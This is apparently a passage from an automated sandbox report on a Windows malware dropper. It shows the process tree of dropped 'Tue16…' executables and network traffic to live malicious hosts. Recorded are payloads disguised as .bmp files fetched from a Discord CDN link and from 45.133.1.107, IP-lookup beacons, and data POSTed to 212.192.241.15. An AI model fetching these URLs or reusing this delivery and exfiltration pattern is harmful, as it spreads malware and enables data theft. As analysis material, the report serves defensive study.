      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:892
    - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        5⤵
        
        PID:2712
    - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        5⤵
        
        PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue166ff30c98d.exe
    3⤵
    - Loads dropped DLL
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16348e27700cd15c.exe
    3⤵
    PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue168e957580fbc2.exe
    3⤵
    - Loads dropped DLL
    PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue1628cd68fb2319b0.exe
    3⤵
    - Loads dropped DLL
    PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16d47340279.exe
    3⤵
    - Loads dropped DLL
    PID:1016
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 476
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1984

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe
Tue1628cd68fb2319b0.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1576
- C:\Users\Admin\AppData\Local\Temp\is-IDKP0.tmp\Tue1628cd68fb2319b0.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-IDKP0.tmp\Tue1628cd68fb2319b0.tmp" /SL5="$60126,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:820
- - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe" /SILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\is-AOE08.tmp\Tue1628cd68fb2319b0.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-AOE08.tmp\Tue1628cd68fb2319b0.tmp" /SL5="$70126,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe" /SILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:804

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue168e957580fbc2.exe
Tue168e957580fbc2.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1636

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue166ff30c98d.exe
Tue166ff30c98d.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1828

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16d47340279.exe
Tue16d47340279.exe
1⤵
- Executes dropped EXE
PID:1932

Network

GET

http://45.133.1.107/server.txt

Tue16c335f877.exe

Remote address:

45.133.1.107:80

Request

GET /server.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 45.133.1.107

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 04 Nov 2021 12:32:45 GMT
ETag: "13-5cff5b943f0c1"
Accept-Ranges: bytes
Content-Length: 19
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
GET

http://212.192.241.15/base/api/statistics.php

Tue16c335f877.exe

Remote address:

212.192.241.15:80

Request

GET /base/api/statistics.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:31 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 94
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://45.133.1.107/server.txt

Tue16703646a5ae7.exe

Remote address:

45.133.1.107:80

Request

GET /server.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 45.133.1.107

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 04 Nov 2021 12:32:45 GMT
ETag: "13-5cff5b943f0c1"
Accept-Ranges: bytes
Content-Length: 19
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
GET

http://212.192.241.15/base/api/statistics.php

Tue16703646a5ae7.exe

Remote address:

212.192.241.15:80

Request

GET /base/api/statistics.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:31 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 94
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

marianu.xyz

setup_install.exe

Remote address:

8.8.8.8:53

Request

marianu.xyz

IN A

Response
DNS

marianu.xyz

setup_install.exe

Remote address:

8.8.8.8:53

Request

marianu.xyz

IN A

Response
DNS

www.listincode.com

Tue16b2877f8bd.exe

Remote address:

8.8.8.8:53

Request

www.listincode.com

IN A

Response

www.listincode.com

IN A

149.28.253.196
DNS

telegatt.top

Tue16a1e0194b6e612.exe

Remote address:

8.8.8.8:53

Request

telegatt.top

IN A

Response
DNS

gcl-gb.biz

Tue165ca48696e212.exe

Remote address:

8.8.8.8:53

Request

gcl-gb.biz

IN A

Response

gcl-gb.biz

IN A

78.40.109.119

gcl-gb.biz

IN A

195.123.220.59
GET

http://gcl-gb.biz/stats/1.php?pub=/mixone&badparam=NOPE

Tue165ca48696e212.exe

Remote address:

78.40.109.119:80

Request

GET /stats/1.php?pub=/mixone&badparam=NOPE HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: gcl-gb.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 09 Nov 2021 13:22:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET

http://gcl-gb.biz/check.php?pub=mixone

Tue165ca48696e212.exe

Remote address:

78.40.109.119:80

Request

GET /check.php?pub=mixone HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Bz-5j-8d-AP-x-j
Host: gcl-gb.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 09 Nov 2021 13:22:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET

https://www.listincode.com/

Tue16b2877f8bd.exe

Remote address:

149.28.253.196:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.listincode.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 09 Nov 2021 13:22:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Access-Control-Allow-Origin: *
DNS

cdn.discordapp.com

Tue16c335f877.exe

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.134.233
GET

https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

Tue16703646a5ae7.exe

Remote address:

162.159.130.233:443

Request

GET /attachments/891021838312931420/906790845167063140/PL_Client.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:48 GMT
Content-Type: image/x-ms-bmp
Content-Length: 1335812
Connection: keep-alive
CF-Ray: 6ab75a1a0c660b74-AMS
Accept-Ranges: bytes
Age: 197925
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=PL_Client.bmp
ETag: "74ad528eb7a59567e745fd4894f2d458"
Expires: Wed, 09 Nov 2022 13:22:48 GMT
Last-Modified: Sun, 07 Nov 2021 06:23:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636266184911820
x-goog-hash: crc32c=VMZwDw==
x-goog-hash: md5=dK1SjrellWfnRf1IlPLUWA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1335812
X-GUploader-UploadID: ADPycdt53Xx1HiS_dTrBpGZARlg4NWMItAXIjW_xFv9_aKjRdZRYHyX-R2L0P2V2f-2nRChjGV9KdKytseI2a1xSU1Y
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2lkLFf08vCLn0p2hag4G1FPkFm12Wj36s6xN7jwNoiemC95OCqgsH6uW1bUY35Byj6CmCHu717e6m8eBWaQ6k2m6g8%2FYnb%2FtJReEyXU1juLOm2A3T3IquUiynPLoeTM2faqAqA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET

https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

Tue16c335f877.exe

Remote address:

162.159.130.233:443

Request

GET /attachments/891021838312931420/906790845167063140/PL_Client.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:48 GMT
Content-Type: image/x-ms-bmp
Content-Length: 1335812
Connection: keep-alive
CF-Ray: 6ab75a1ac9634c9e-AMS
Accept-Ranges: bytes
Age: 197925
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=PL_Client.bmp
ETag: "74ad528eb7a59567e745fd4894f2d458"
Expires: Wed, 09 Nov 2022 13:22:48 GMT
Last-Modified: Sun, 07 Nov 2021 06:23:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636266184911820
x-goog-hash: crc32c=VMZwDw==
x-goog-hash: md5=dK1SjrellWfnRf1IlPLUWA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1335812
X-GUploader-UploadID: ADPycdt53Xx1HiS_dTrBpGZARlg4NWMItAXIjW_xFv9_aKjRdZRYHyX-R2L0P2V2f-2nRChjGV9KdKytseI2a1xSU1Y
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I1cRkPbcTLrGoMqHRe6Nf3g8j1AZyh3pzMs0EHo%2BONLiEB4a8JXKBma2npBGUeiYjsq51UfKRUYa5scNyOSfeGBuH04UFZfpGvWZ9%2BWiecWKfONEzWHc8Gyxv%2F1Nwu9ccPWHbA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
DNS

propanla.com

Tue1628cd68fb2319b0.tmp

Remote address:

8.8.8.8:53

Request

propanla.com

IN A

Response
DNS

propanla.com

Tue1628cd68fb2319b0.tmp

Remote address:

8.8.8.8:53

Request

propanla.com

IN A

Response
DNS

propanla.com

Tue1628cd68fb2319b0.tmp

Remote address:

8.8.8.8:53

Request

propanla.com

IN A

Response
DNS

statuse.digitalcertvalidation.com

Tue16b2877f8bd.exe

Remote address:

8.8.8.8:53

Request

statuse.digitalcertvalidation.com

IN A

Response

statuse.digitalcertvalidation.com

IN CNAME

ocsp.digicert.com

ocsp.digicert.com

IN CNAME

cs9.wac.phicdn.net

cs9.wac.phicdn.net

IN A

72.21.91.29
GET

http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D

Tue16b2877f8bd.exe

Remote address:

72.21.91.29:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: statuse.digitalcertvalidation.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 615
Cache-Control: max-age=92904
Content-Type: application/ocsp-response
Date: Tue, 09 Nov 2021 13:22:46 GMT
Etag: "61893ba8-1d7"
Expires: Wed, 10 Nov 2021 15:11:10 GMT
Last-Modified: Mon, 08 Nov 2021 15:00:56 GMT
Server: ECS (dcb/7F15)
X-Cache: HIT
Content-Length: 471
DNS

iplogger.org

Tue16b2877f8bd.exe

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

88.99.66.31
GET

https://iplogger.org/1mxKf7

Tue16b2877f8bd.exe

Remote address:

88.99.66.31:443

Request

GET /1mxKf7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: iplogger.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Tue, 09 Nov 2021 13:22:56 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=r30mv526vbea4fbfgotdfenpd7; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242584015; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 4dc06e46e01f945b2bfd459497806efb5b1d16cb37f57e11cddf0c0a55f54a60
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

ipinfo.io

Tue16703646a5ae7.exe

Remote address:

8.8.8.8:53

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.59.81
GET

https://ipinfo.io/widget

Tue16c335f877.exe

Remote address:

34.117.59.81:443

Request

GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io

Response

HTTP/1.1 200 OK

access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 893
date: Tue, 09 Nov 2021 13:22:49 GMT
x-envoy-upstream-service-time: 32
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: clear
GET

https://ipinfo.io/widget

Tue16703646a5ae7.exe

Remote address:

34.117.59.81:443

Request

GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io

Response

HTTP/1.1 200 OK

access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 893
date: Tue, 09 Nov 2021 13:22:49 GMT
x-envoy-upstream-service-time: 37
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: clear
POST

http://212.192.241.15/base/api/getData.php

Tue16c335f877.exe

Remote address:

212.192.241.15:80

Request

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 4829
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:50 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://212.192.241.15/base/api/getData.php

Tue16c335f877.exe

Remote address:

212.192.241.15:80

Request

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:50 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://212.192.241.15/base/api/getData.php

Tue16703646a5ae7.exe

Remote address:

212.192.241.15:80

Request

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 4829
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:50 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://212.192.241.15/base/api/getData.php

Tue16703646a5ae7.exe

Remote address:

212.192.241.15:80

Request

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:50 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

propanla.com

Tue1628cd68fb2319b0.tmp

Remote address:

8.8.8.8:53

Request

propanla.com

IN A

Response
DNS

propanla.com

Tue1628cd68fb2319b0.tmp

Remote address:

8.8.8.8:53

Request

propanla.com

IN A

Response
HEAD

http://45.133.1.107/download/NiceProcessX64.bmp

Tue16703646a5ae7.exe

Remote address:

45.133.1.107:80

Request

HEAD /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.107
Content-Length: 0
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
GET

http://45.133.1.107/download/NiceProcessX64.bmp

Tue16703646a5ae7.exe

Remote address:

45.133.1.107:80

Request

GET /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.107
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
HEAD

http://45.133.1.107/download/NiceProcessX64.bmp

Tue16c335f877.exe

Remote address:

45.133.1.107:80

Request

HEAD /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.107
Content-Length: 0
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
GET

http://45.133.1.107/download/NiceProcessX64.bmp

Tue16c335f877.exe

Remote address:

45.133.1.107:80

Request

GET /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.107
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
POST

http://212.192.241.15/base/api/getData.php

Remote address:

212.192.241.15:80

Request

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:57 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 1536
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://212.192.241.15/base/api/getData.php

Remote address:

212.192.241.15:80

Request

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.192.241.15

Response

HTTP/1.1 200 OK

Date: Tue, 09 Nov 2021 13:22:58 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 5504
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

www.iyiqian.com

Remote address:

8.8.8.8:53

Request

www.iyiqian.com

IN A

Response

www.iyiqian.com

IN A

103.155.92.58
DNS

niemannbest.me

Remote address:

8.8.8.8:53

Request

niemannbest.me

IN A

Response

niemannbest.me

IN A

172.67.221.103

niemannbest.me

IN A

104.21.51.48
DNS

telegka.top

Remote address:

8.8.8.8:53

Request

telegka.top

IN A

Response
DNS

all-mobile-pa1ments.com.mx

Remote address:

8.8.8.8:53

Request

all-mobile-pa1ments.com.mx

IN A

Response
DNS

buy-fantasy-football.com.sg

Remote address:

8.8.8.8:53

Request

buy-fantasy-football.com.sg

IN A

Response
DNS

topniemannpickshop.cc

Remote address:

8.8.8.8:53

Request

topniemannpickshop.cc

IN A

Response
DNS

telegin.top

Remote address:

8.8.8.8:53

Request

telegin.top

IN A

Response
DNS

t.me

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99

45.133.1.107:80

http://45.133.1.107/server.txt

http

Tue16c335f877.exe

482 B
858 B
6
6

HTTP Request

GET http://45.133.1.107/server.txt

HTTP Response

200
212.192.241.15:80

http://212.192.241.15/base/api/statistics.php

http

Tue16c335f877.exe

497 B
910 B
6
5

HTTP Request

GET http://212.192.241.15/base/api/statistics.php

HTTP Response

200
45.133.1.107:80

http://45.133.1.107/server.txt

http

Tue16703646a5ae7.exe

482 B
858 B
6
6

HTTP Request

GET http://45.133.1.107/server.txt

HTTP Response

200
212.192.241.15:80

http://212.192.241.15/base/api/statistics.php

http

Tue16703646a5ae7.exe

497 B
910 B
6
5

HTTP Request

GET http://212.192.241.15/base/api/statistics.php

HTTP Response

200
78.40.109.119:80

http://gcl-gb.biz/check.php?pub=mixone

http

Tue165ca48696e212.exe

672 B
807 B
8
6

HTTP Request

GET http://gcl-gb.biz/stats/1.php?pub=/mixone&badparam=NOPE

HTTP Response

200

HTTP Request

GET http://gcl-gb.biz/check.php?pub=mixone

HTTP Response

200
149.28.253.196:443

https://www.listincode.com/

tls, http

Tue16b2877f8bd.exe

1.3kB
4.1kB
11
10

HTTP Request

GET https://www.listincode.com/

HTTP Response

200
127.0.0.1:49288

setup_install.exe
127.0.0.1:49290

setup_install.exe
162.159.130.233:80

cdn.discordapp.com

tls

Tue16703646a5ae7.exe

399 B
528 B
5
5
162.159.130.233:80

cdn.discordapp.com

tls

Tue16c335f877.exe

399 B
528 B
5
5
162.159.130.233:80

cdn.discordapp.com

tls

Tue16703646a5ae7.exe

361 B
528 B
5
5
162.159.130.233:80

cdn.discordapp.com

tls

Tue16c335f877.exe

361 B
528 B
5
5
162.159.130.233:80

cdn.discordapp.com

tls

Tue16703646a5ae7.exe

288 B
528 B
5
5
162.159.130.233:80

cdn.discordapp.com

tls

Tue16c335f877.exe

288 B
528 B
5
5
162.159.130.233:80

cdn.discordapp.com

Tue16c335f877.exe

190 B
92 B
4
2
162.159.130.233:80

cdn.discordapp.com

Tue16703646a5ae7.exe

190 B
92 B
4
2
162.159.130.233:443

https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

tls, http

Tue16703646a5ae7.exe

23.2kB
1.4MB
492
951

HTTP Request

GET https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

HTTP Response

200
162.159.130.233:443

https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

tls, http

Tue16c335f877.exe

23.8kB
1.4MB
505
954

HTTP Request

GET https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

HTTP Response

200
72.21.91.29:80

http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D

http

Tue16b2877f8bd.exe

575 B
1.8kB
7
6

HTTP Request

GET http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D

HTTP Response

200
88.99.66.31:443

